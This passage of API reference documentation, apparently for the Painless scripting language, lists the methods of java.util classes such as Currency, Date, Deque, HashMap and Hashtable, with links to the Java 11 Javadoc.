{java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Currency]] -==== Currency -* static Set {java11-javadoc}/java.base/java/util/Currency.html#getAvailableCurrencies()[getAvailableCurrencies]() -* static Currency {java11-javadoc}/java.base/java/util/Currency.html#getInstance(java.lang.String)[getInstance](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/Currency.html#getCurrencyCode()[getCurrencyCode]() -* int {java11-javadoc}/java.base/java/util/Currency.html#getDefaultFractionDigits()[getDefaultFractionDigits]() -* null {java11-javadoc}/java.base/java/util/Currency.html#getDisplayName()[getDisplayName]() -* null {java11-javadoc}/java.base/java/util/Currency.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* int {java11-javadoc}/java.base/java/util/Currency.html#getNumericCode()[getNumericCode]() -* null {java11-javadoc}/java.base/java/util/Currency.html#getSymbol()[getSymbol]() -* null {java11-javadoc}/java.base/java/util/Currency.html#getSymbol(java.util.Locale)[getSymbol](Locale) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Date]] 
-==== Date -* static Date {java11-javadoc}/java.base/java/util/Date.html#from(java.time.Instant)[from](Instant) -* {java11-javadoc}/java.base/java/util/Date.html#()[Date]() -* {java11-javadoc}/java.base/java/util/Date.html#(long)[Date](long) -* boolean {java11-javadoc}/java.base/java/util/Date.html#after(java.util.Date)[after](Date) -* boolean {java11-javadoc}/java.base/java/util/Date.html#before(java.util.Date)[before](Date) -* def {java11-javadoc}/java.base/java/util/Date.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/util/Date.html#compareTo(java.util.Date)[compareTo](Date) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Date.html#getTime()[getTime]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/Date.html#setTime(long)[setTime](long) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Deque]] -==== Deque -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* void {java11-javadoc}/java.base/java/util/Deque.html#addFirst(java.lang.Object)[addFirst](def) -* void {java11-javadoc}/java.base/java/util/Deque.html#addLast(java.lang.Object)[addLast](def) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* Iterator {java11-javadoc}/java.base/java/util/Deque.html#descendingIterator()[descendingIterator]() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/Deque.html#getFirst()[getFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#getLast()[getLast]() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerFirst(java.lang.Object)[offerFirst](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerLast(java.lang.Object)[offerLast](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekFirst()[peekFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekLast()[peekLast]() -* def 
{java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollFirst()[pollFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollLast()[pollLast]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pop()[pop]() -* void {java11-javadoc}/java.base/java/util/Deque.html#push(java.lang.Object)[push](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeFirst()[removeFirst]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeFirstOccurrence(java.lang.Object)[removeFirstOccurrence](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeLast()[removeLast]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeLastOccurrence(java.lang.Object)[removeLastOccurrence](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Dictionary]] -==== Dictionary -* Enumeration {java11-javadoc}/java.base/java/util/Dictionary.html#elements()[elements]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/util/Dictionary.html#get(java.lang.Object)[get](def) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Dictionary.html#isEmpty()[isEmpty]() -* Enumeration {java11-javadoc}/java.base/java/util/Dictionary.html#keys()[keys]() -* def {java11-javadoc}/java.base/java/util/Dictionary.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* def {java11-javadoc}/java.base/java/util/Dictionary.html#remove(java.lang.Object)[remove](def) -* int {java11-javadoc}/java.base/java/util/Dictionary.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleSummaryStatistics]] -==== DoubleSummaryStatistics -* {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#()[DoubleSummaryStatistics]() -* void {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#accept(double)[accept](double) -* DoubleConsumer {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#andThen(java.util.function.DoubleConsumer)[andThen](DoubleConsumer) -* void {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#combine(java.util.DoubleSummaryStatistics)[combine](DoubleSummaryStatistics) -* boolean 
{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#getAverage()[getAverage]() -* long {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#getCount()[getCount]() -* double {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#getMax()[getMax]() -* double {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#getMin()[getMin]() -* double {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#getSum()[getSum]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DuplicateFormatFlagsException]] -==== DuplicateFormatFlagsException -* {java11-javadoc}/java.base/java/util/DuplicateFormatFlagsException.html#(java.lang.String)[DuplicateFormatFlagsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/DuplicateFormatFlagsException.html#getFlags()[getFlags]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-EmptyStackException]] -==== EmptyStackException -* {java11-javadoc}/java.base/java/util/EmptyStackException.html#()[EmptyStackException]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Enumeration]] -==== Enumeration -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/util/Enumeration.html#hasMoreElements()[hasMoreElements]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Enumeration.html#nextElement()[nextElement]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-EventListener]] -==== EventListener -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-EventListenerProxy]] -==== EventListenerProxy -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* EventListener {java11-javadoc}/java.base/java/util/EventListenerProxy.html#getListener()[getListener]() -* int 
{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-EventObject]] -==== EventObject -* {java11-javadoc}/java.base/java/util/EventObject.html#(java.lang.Object)[EventObject](Object) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Object {java11-javadoc}/java.base/java/util/EventObject.html#getSource()[getSource]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-FormatFlagsConversionMismatchException]] -==== FormatFlagsConversionMismatchException -* {java11-javadoc}/java.base/java/util/FormatFlagsConversionMismatchException.html#(java.lang.String,char)[FormatFlagsConversionMismatchException](null, char) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* char {java11-javadoc}/java.base/java/util/FormatFlagsConversionMismatchException.html#getConversion()[getConversion]() -* null {java11-javadoc}/java.base/java/util/FormatFlagsConversionMismatchException.html#getFlags()[getFlags]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Formattable]] -==== Formattable -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/Formattable.html#formatTo(java.util.Formatter,int,int,int)[formatTo](Formatter, int, int, int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-FormattableFlags]] -==== FormattableFlags -* static int {java11-javadoc}/java.base/java/util/FormattableFlags.html#ALTERNATE[ALTERNATE] -* static int {java11-javadoc}/java.base/java/util/FormattableFlags.html#LEFT_JUSTIFY[LEFT_JUSTIFY] -* static int {java11-javadoc}/java.base/java/util/FormattableFlags.html#UPPERCASE[UPPERCASE] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Formatter]] -==== Formatter -* {java11-javadoc}/java.base/java/util/Formatter.html#()[Formatter]() -* {java11-javadoc}/java.base/java/util/Formatter.html#(java.lang.Appendable)[Formatter](Appendable) -* {java11-javadoc}/java.base/java/util/Formatter.html#(java.lang.Appendable,java.util.Locale)[Formatter](Appendable, Locale) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Formatter {java11-javadoc}/java.base/java/util/Formatter.html#format(java.lang.String,java.lang.Object%5B%5D)[format](null, def[]) -* Formatter 
{java11-javadoc}/java.base/java/util/Formatter.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, null, def[]) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Locale {java11-javadoc}/java.base/java/util/Formatter.html#locale()[locale]() -* Appendable {java11-javadoc}/java.base/java/util/Formatter.html#out()[out]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Formatter-BigDecimalLayoutForm]] -==== Formatter.BigDecimalLayoutForm -* static Formatter.BigDecimalLayoutForm {java11-javadoc}/java.base/java/util/Formatter$BigDecimalLayoutForm.html#DECIMAL_FLOAT[DECIMAL_FLOAT] -* static Formatter.BigDecimalLayoutForm {java11-javadoc}/java.base/java/util/Formatter$BigDecimalLayoutForm.html#SCIENTIFIC[SCIENTIFIC] -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-FormatterClosedException]] -==== FormatterClosedException -* {java11-javadoc}/java.base/java/util/FormatterClosedException.html#()[FormatterClosedException]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-GregorianCalendar]] -==== GregorianCalendar -* static int {java11-javadoc}/java.base/java/util/GregorianCalendar.html#AD[AD] -* static int {java11-javadoc}/java.base/java/util/GregorianCalendar.html#BC[BC] -* static GregorianCalendar {java11-javadoc}/java.base/java/util/GregorianCalendar.html#from(java.time.ZonedDateTime)[from](ZonedDateTime) -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#()[GregorianCalendar]() -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#(java.util.TimeZone)[GregorianCalendar](TimeZone) -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#(java.util.TimeZone,java.util.Locale)[GregorianCalendar](TimeZone, Locale) -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#(int,int,int)[GregorianCalendar](int, int, int) -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#(int,int,int,int,int)[GregorianCalendar](int, int, int, int, int) -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#(int,int,int,int,int,int)[GregorianCalendar](int, int, int, int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#add(int,int)[add](int, int) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#after(java.lang.Object)[after](Object) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#before(java.lang.Object)[before](Object) -* void 
{java11-javadoc}/java.base/java/util/Calendar.html#clear()[clear]() -* void {java11-javadoc}/java.base/java/util/Calendar.html#clear(int)[clear](int) -* def {java11-javadoc}/java.base/java/util/Calendar.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#compareTo(java.util.Calendar)[compareTo](Calendar) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/Calendar.html#get(int)[get](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getActualMaximum(int)[getActualMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getActualMinimum(int)[getActualMinimum](int) -* null {java11-javadoc}/java.base/java/util/Calendar.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/util/Calendar.html#getDisplayName(int,int,java.util.Locale)[getDisplayName](int, int, Locale) -* Map {java11-javadoc}/java.base/java/util/Calendar.html#getDisplayNames(int,int,java.util.Locale)[getDisplayNames](int, int, Locale) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getFirstDayOfWeek()[getFirstDayOfWeek]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getGreatestMinimum(int)[getGreatestMinimum](int) -* Date {java11-javadoc}/java.base/java/util/GregorianCalendar.html#getGregorianChange()[getGregorianChange]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getLeastMaximum(int)[getLeastMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMaximum(int)[getMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMinimalDaysInFirstWeek()[getMinimalDaysInFirstWeek]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMinimum(int)[getMinimum](int) -* Date {java11-javadoc}/java.base/java/util/Calendar.html#getTime()[getTime]() -* long {java11-javadoc}/java.base/java/util/Calendar.html#getTimeInMillis()[getTimeInMillis]() -* TimeZone {java11-javadoc}/java.base/java/util/Calendar.html#getTimeZone()[getTimeZone]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getWeekYear()[getWeekYear]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getWeeksInWeekYear()[getWeeksInWeekYear]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/GregorianCalendar.html#isLeapYear(int)[isLeapYear](int) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isLenient()[isLenient]() -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isSet(int)[isSet](int) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isWeekDateSupported()[isWeekDateSupported]() -* void {java11-javadoc}/java.base/java/util/Calendar.html#roll(int,int)[roll](int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int)[set](int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int)[set](int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int,int,int)[set](int, int, int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int,int,int,int)[set](int, int, int, int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setFirstDayOfWeek(int)[setFirstDayOfWeek](int) -* void {java11-javadoc}/java.base/java/util/GregorianCalendar.html#setGregorianChange(java.util.Date)[setGregorianChange](Date) -* void 
{java11-javadoc}/java.base/java/util/Calendar.html#setLenient(boolean)[setLenient](boolean) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setMinimalDaysInFirstWeek(int)[setMinimalDaysInFirstWeek](int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTime(java.util.Date)[setTime](Date) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTimeInMillis(long)[setTimeInMillis](long) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTimeZone(java.util.TimeZone)[setTimeZone](TimeZone) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setWeekDate(int,int,int)[setWeekDate](int, int, int) -* Instant {java11-javadoc}/java.base/java/util/Calendar.html#toInstant()[toInstant]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* ZonedDateTime {java11-javadoc}/java.base/java/util/GregorianCalendar.html#toZonedDateTime()[toZonedDateTime]() - - -[[painless-api-reference-shared-HashMap]] -==== HashMap -* {java11-javadoc}/java.base/java/util/HashMap.html#()[HashMap]() -* {java11-javadoc}/java.base/java/util/HashMap.html#(java.util.Map)[HashMap](Map) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/HashMap.html#clone()[clone]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def 
{java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-HashSet]] -==== HashSet -* {java11-javadoc}/java.base/java/util/HashSet.html#()[HashSet]() -* {java11-javadoc}/java.base/java/util/HashSet.html#(java.util.Collection)[HashSet](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/HashSet.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - 
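As a quick orientation, here is a minimal Painless sketch exercising a few of the `HashMap` and `HashSet` methods listed above. The variable names and literal values (`counts`, `seen`, `'a'`, and so on) are made up for illustration; the unlinked entries in the listings (such as `findAll`) are Painless additions on top of the JDK API, and only methods that appear in the listings are used here.

[source,painless]
----
// Hypothetical data; only methods from the HashMap/HashSet listings are used.
Map counts = new HashMap();
counts.put('a', 1);
counts.put('b', 2);
counts.computeIfAbsent('c', k -> 0);           // insert a default entry
int b = counts.getOrDefault('b', 0);           // 2

Set seen = new HashSet();
seen.add('a');
seen.add('b');
boolean hasA = seen.contains('a');             // true
List frequent = seen.findAll(v -> counts.getOrDefault(v, 0) > 1); // ['b']
----
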
-[[painless-api-reference-shared-Hashtable]] -==== Hashtable -* {java11-javadoc}/java.base/java/util/Hashtable.html#()[Hashtable]() -* {java11-javadoc}/java.base/java/util/Hashtable.html#(java.util.Map)[Hashtable](Map) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/Hashtable.html#clone()[clone]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Enumeration 